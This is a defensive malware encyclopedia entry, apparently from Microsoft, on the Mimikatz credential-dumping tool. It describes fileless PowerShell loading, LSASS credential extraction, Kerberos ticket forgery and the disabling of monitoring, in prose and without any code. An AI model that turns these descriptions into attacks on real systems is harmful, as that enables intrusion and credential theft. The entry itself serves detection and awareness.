Home / malwarePDF  

HackTool:Win32/Mikatz


First posted on 16 January 2017.
Source: Microsoft

Aliases :

There are no other names known for HackTool:Win32/Mikatz.

Explanation :

Installation

A special PowerShell script (Invoke-Mimikatz.ps1) allows PowerShell to perform remote fileless execution of this threat. In essence, fileless execution enables loading of a binary into process space without touching the hard disk. When a fileless binary is loaded directly into memory, it remains invisible for file scanning antivirus solutions.

In a typical credential harvesting scenario, a malicious hacker can run a PowerShell command to trick the victim's machine to download the script from a malicious server.

Next, the downloaded script uses reflective DLL injection to load and run the threat remotely without storing any files on the disk of the compromised machine.

As a result of this, the malicious hacker can remotely leverage the threat to execute malicious activity like stealing credentials, certificates, and collecting data from the compromised host.

Payload

This threat can:

  • Recover and export Windows passwords in clear-text by injecting a DLL into lsass.exe
  • Export security certificates
  • Fileless execution through PowerShell
  • Inject DLLs into running processes
  • List running system and user processes
  • Obtain all process tokens
  • Impersonate a token
  • Get a list with loaded kernel drivers
  • Get a table with all service calls and corresponding kernel modules names
  • Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
  • BSOD the machine
  • Modify privileges
  • Bypass some Group Policy settings
  • Disable some security and event monitoring services
  • Bypass Microsoft AppLocker / Software Restriction Polices
  • Gather critical data for security and instrumentation software running on the host


Recover and export Windows credentials

This threat can dump credentials from LSASS (Windows Local Security Account database) including:
  • NT Lan Manager (NTLM) password hashes
  • LAN Manager password hashes
  • Kerberos password, ekeys, tickets, and PIN
  • TsPkg (password)
  • WDigest (clear-text password)
  • LiveSSP (clear-text password)
  • SSP (clear-text password)
  • DPAPI hashes and keys


It can also:
  • Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
  • Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
  • Export certificates and keys
  • Dump cached credentials
  • Stop event monitoring
  • Patch Terminal Server
  • Bypass basic Group Policy Objects




Due to the generic nature of this detection, we are unable to provide specific information about how the threat behaves.

Find out more about how we use machine learning to help guard against the latest malware threats:

Windows Defender: Rise of the machine (learning)

Last update 16 January 2017

 

TOP